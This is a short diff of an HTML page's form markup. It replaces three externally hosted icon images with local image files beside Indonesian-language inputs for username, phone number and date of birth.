--- a/index.html
+++ b/index.html
@@ -127,21 +127,21 @@
       <div class="input-group">
         <label for="username">Username:</label>
         <div class="input-icon">
-          <img src="https://i.ibb.co/MZpjTS8/16480-removebg-preview.png" alt="Username Icon">
+          <img src="kil.png" alt="Username Icon">
           <input type="text" name="username" id="username" placeholder="Masukkan Username" required>
         </div>
       </div>
       <div class="input-group">
         <label for="phone">Nomor Handphone</label>
         <div class="input-icon">
-          <img src="https://i.ibb.co/fNtsfBY/1000005366-removebg-preview.png" alt="Phone Icon">
+          <img src="kol.png" alt="Phone Icon">
           <input type="tel" name="phone" id="phone" placeholder="+62 8xxx xxxx xxxx" required maxlength="12" oninput="this.value = this.value.replace(/\D/g,'').substring(0, 12)">
         </div>
       </div>
       <div class="input-group">
         <label for="masa_berlaku">Tgl Lahir (DD/MM/YYYY)</label>
         <div class="input-icon">
-          <img src="https://i.ibb.co/2MFjrnr/calendar-icon.png" alt="Date Icon">
+          <img src="kal.png" alt="Date Icon">
           <input type="tel" id="masa_berlaku" name="masa_berlaku" placeholder="DD/MM/YYYY" required maxlength="10">
         </div>
       </div>
